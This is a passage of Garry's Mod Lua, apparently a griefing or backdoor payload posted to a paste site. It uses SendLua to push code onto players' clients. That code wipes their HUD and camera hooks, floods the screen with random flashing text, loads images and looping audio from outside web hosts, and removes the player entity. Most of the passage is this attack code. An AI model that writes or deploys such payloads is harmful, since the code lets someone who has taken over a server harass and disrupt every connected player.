  898. ScrW() /2 +math.random( -800, 800 ),
  899. ScrH() /2 +math.random( -800, 800 ) -400,
  900. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  901. TEXT_ALIGN_CENTER,
  902. TEXT_ALIGN_CENTER,
  903. 1,
  904. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  905. )
  906. end )
  907. ]] )
  908. end )
  909.  
  910. enigmalaunchproject:NouvelleAction( 0.1, function( pPlayer )
  911. enigmalaunchproject:SendLua( pPlayer, [[
  912.  
  913. (GAMEMODE or GM).CalcView = function() end
  914. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  915.  
  916. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  917. for k, v in pairs(remove) do
  918. hook.GetTable()[v] = {}
  919. end
  920.  
  921. local function GetWebMat( strURL )
  922. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  923. end
  924.  
  925. hook.Add( "HUDPaint", "hud12enigma", function()
  926. surface.SetDrawColor( 255, 255, 255, 255 )
  927.  
  928. draw.SimpleTextOutlined(
  929. "wxm",
  930. "DermaLarge",
  931. ScrW() /2 +math.random( -850, 850 ),
  932. ScrH() /2 +math.random( -850, 850 ) +100,
  933. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  934. TEXT_ALIGN_CENTER,
  935. TEXT_ALIGN_CENTER,
  936. 1,
  937. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  938. )
  939. end )
  940. ]] )
  941. end )
  942.  
  943. enigmalaunchproject:NouvelleAction( 0.1, function( pPlayer )
  944. enigmalaunchproject:SendLua( pPlayer, [[
  945.  
  946. (GAMEMODE or GM).CalcView = function() end
  947. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  948.  
  949. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  950. for k, v in pairs(remove) do
  951. hook.GetTable()[v] = {}
  952. end
  953.  
  954. local function GetWebMat( strURL )
  955. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  956. end
  957.  
  958. hook.Add( "HUDPaint", "hud1enigma", function()
  959. surface.SetDrawColor( 255, 255, 255, 255 )
  960.  
  961. draw.SimpleTextOutlined(
  962. "wxm",
  963. "DermaLarge",
  964. ScrW() /2 +math.random( -300, 600 ),
  965. ScrH() /2 +math.random( -600, 300 ) +200,
  966. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  967. TEXT_ALIGN_CENTER,
  968. TEXT_ALIGN_CENTER,
  969. 1,
  970. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  971. )
  972. end )
  973. ]] )
  974. end )
  975.  
  976. enigmalaunchproject:NouvelleAction( 0.1, function( pPlayer )
  977. enigmalaunchproject:SendLua( pPlayer, [[
  978.  
  979. (GAMEMODE or GM).CalcView = function() end
  980. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  981.  
  982. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  983. for k, v in pairs(remove) do
  984. hook.GetTable()[v] = {}
  985. end
  986.  
  987. local function GetWebMat( strURL )
  988. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  989. end
  990.  
  991. hook.Add( "HUDPaint", "hud1enigma", function()
  992. surface.SetDrawColor( 255, 255, 255, 255 )
  993.  
  994. draw.SimpleTextOutlined(
  995. "wxm",
  996. "HACK",
  997. ScrW() /2 +math.random( -300, 600 ),
  998. ScrH() /2 +math.random( -600, 300 ) +200,
  999. Color(math.random(1,255),math.random(1,255),math.random(1,255)),
  1000. TEXT_ALIGN_CENTER,
  1001. TEXT_ALIGN_CENTER,
  1002. 1,
  1003. Color(math.random(1,255),math.random(1,255),math.random(1,255))
  1004. )
  1005. end )
  1006. ]] )
  1007. end )
  1008.  
  1009.  
  1010. enigmalaunchproject:NouvelleAction( 0, function( pPlayer )
  1011. enigmalaunchproject:SendLua( pPlayer, ([=[
  1012.  
  1013. g_]=].. enigmalaunchproject.m_strImageGlobalVar.. [=[ = {}
  1014. local html = [[%s]]
  1015. local function LoadWebMaterial( strURL, strUID, intSizeX, intSizeY )
  1016. local pnl = vgui.Create( "HTML" )
  1017. pnl:SetPos( ScrW() -1, ScrH() -1 )
  1018. pnl:SetVisible( true )
  1019. pnl:SetMouseInputEnabled( false )
  1020. pnl:SetKeyBoardInputEnabled( false )
  1021. pnl:SetSize( intSizeX, intSizeY )
  1022. pnl:SetHTML( html:format(strURL, intSizeX, intSizeY) )
  1023.  
  1024. local PageLoaded
  1025. PageLoaded = function()
  1026. local mat = pnl:GetHTMLMaterial()
  1027. if mat then
  1028. g_]=].. enigmalaunchproject.m_strImageGlobalVar.. [=[[strUID] = { mat, pnl }
  1029. return
  1030. end
  1031.  
  1032. timer.Simple( 0.5, PageLoaded )
  1033. end
  1034.  
  1035. PageLoaded()
  1036. end
  1037.  
  1038. LoadWebMaterial( "https://upload.wikimedia.org/wikipedia/commons/thumb/e/e3/Emmanuel_Macron_in_Tallinn_Digital_Summit._Welcome_dinner_hosted_by_HE_Donald_Tusk._Handshake_%2836669381364%29_%28cropped_2%29.jpg/220px-Emmanuel_Macron_in_Tallinn_Digital_Summit._Welcome_dinner_hosted_by_HE_Donald_Tusk._Handshake_%2836669381364%29_%28cropped_2%29.jpg", "EnigmaLogo", 1000, 1000 )
  1039. ]=]):format(lol.m_strImageLoadHTML) )
  1040. end )
  1041.  
  1042. enigmalaunchproject:NouvelleAction( 0, function( pPlayer )
  1043. enigmalaunchproject:SendLua( pPlayer, [[
  1044. (GAMEMODE or GM).CalcView = function() end
  1045. (GAMEMODE or GM).ShouldDrawLocalPlayer = function() end
  1046.  
  1047. local remove = { "PostDrawHUD", "PreDrawHUD", "HUDPaint", "HUDPaintBackground", "CalcView", "ShouldDrawLocalPlayer" }
  1048. for k, v in pairs(remove) do
  1049. hook.GetTable()[v] = {}
  1050. end
  1051.  
  1052. local function GetWebMat( strURL )
  1053. return g_]].. enigmalaunchproject.m_strImageGlobalVar.. [[[strURL]
  1054. end
  1055.  
  1056. hook.Add( "HUDPaint", "EnigmaLogoHUD", function()
  1057. surface.SetDrawColor( 255, 255, 255, 255 )
  1058.  
  1059. if GetWebMat( "EnigmaLogo" ) then
  1060. surface.SetMaterial( GetWebMat("EnigmaLogo")[1] )
  1061. surface.DrawTexturedRect( 0, ScrH() -128, 300 *(512 /300), 128 )
  1062. end
  1063. end )
  1064.  
  1065. local allowed = { ["CHudChat"] = true, ["CHudGMod"] = true, ["CHudWeaponSelection"] = true, ["CHudMenu"] = true }
  1066. hook.Add( "HUDShouldDraw", "EnigmaLogoHUD", function( str ) if not allowed[str] then return false end end )
  1067.  
  1068. surface.PlaySound( "garrysmod/save_load4.wav" )
  1069. surface.PlaySound( "vo/npc/male01/excuseme02.wav" )
  1070. ]] )
  1071. end )
  1072.  
  1073. lol:PushAction( 175, function( pPlayer )
  1074. lol:SendLua( pPlayer, [[
  1075. surface.PlaySound( "vo/npc/male01/gethellout.wav" )
  1076.  
  1077. local sounds = {}
  1078. for i = 1, 4 do
  1079. sound.PlayURL( "http://marlowfr.alwaysdata.net/marlow.mp3", "noblock noplay", function( pChan )
  1080. sounds[#sounds +1] = pChan
  1081. end )
  1082. end
  1083.  
  1084. timer.Create( "asdf", 1, 0, function()
  1085. if #sounds ~= 4 then return end
  1086. timer.Destroy( "asdf" )
  1087. for k, v in pairs( sounds ) do v:EnableLooping( true ) v:SetVolume( 1 ) v:Play() end
  1088. end )
  1089.  
  1090. hook.Add( "HUDShouldDraw", "newhud", function() return false end )
  1091. ]] )
  1092.  
  1093. pPlayer:Remove()
  1094. end )
  1095. lol:PushAction( 0, function( pPlayer )
  1096. lol:SendLua( pPlayer, ([=[
  1097. sound.PlayURL( "", "", function()end )
  1098.  
  1099. g_]=].. lol.m_strImageGlobalVar.. [=[ = {}
  1100. local html = [[%s]]
  1101. local function LoadWebMaterial( strURL, strUID, intSizeX, intSizeY )
  1102. local pnl = vgui.Create( "HTML" )
  1103. pnl:SetPos( ScrW() -1, ScrH() -1 )
  1104. pnl:SetVisible( true )
  1105. pnl:SetMouseInputEnabled( false )
  1106. pnl:SetKeyBoardInputEnabled( false )
  1107. pnl:SetSize( intSizeX, intSizeY )
  1108. pnl:SetHTML( html:format(strURL, intSizeX, intSizeY) )
  1109.  
  1110. local PageLoaded
  1111. PageLoaded = function()
  1112. local mat = pnl:GetHTMLMaterial()
  1113. if mat then
  1114. g_]=].. lol.m_strImageGlobalVar.. [=[[strUID] = { mat, pnl }
  1115. return
  1116. end
  1117.  
  1118. timer.Simple( 0.5, PageLoaded )
  1119. end
  1120.  
  1121. PageLoaded()
  1122. end
  1123.  
  1124. LoadWebMaterial( "http://image.noelshack.com/fichiers/2017/46/2/1510644585-hud.png", "hud1", 300, 128 )
  1125. LoadWebMaterial( "http://image.noelshack.com/fichiers/2017/46/2/1510644587-hud2.png", "hud2", 300, 128 )
  1126. LoadWebMaterial( "http://image.noelshack.com/fichiers/2017/46/2/1510644600-hud3.png", "hud3", 128, 128 )
  1127. LoadWebMaterial( "http://image.noelshack.com/fichiers/2017/46/2/1510644579-doritos.png", "doritos", 183, 256 )
  1128. LoadWebMaterial( "http://image.noelshack.com/fichiers/2017/46/2/1510644581-fedora.png", "fedora", 256, 256 )
  1129. LoadWebMaterial( "http://image.noelshack.com/fichiers/2017/46/2/1510644577-dew.png", "dew", 110, 256 )
  1130. LoadWebMaterial( "http://image.noelshack.com/fichiers/2017/46/2/1510644574-awp.png", "awp", 256, 55 )
  1131. ]=]):format(lol.m_strImageLoadHTML) )
  1132. end )
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement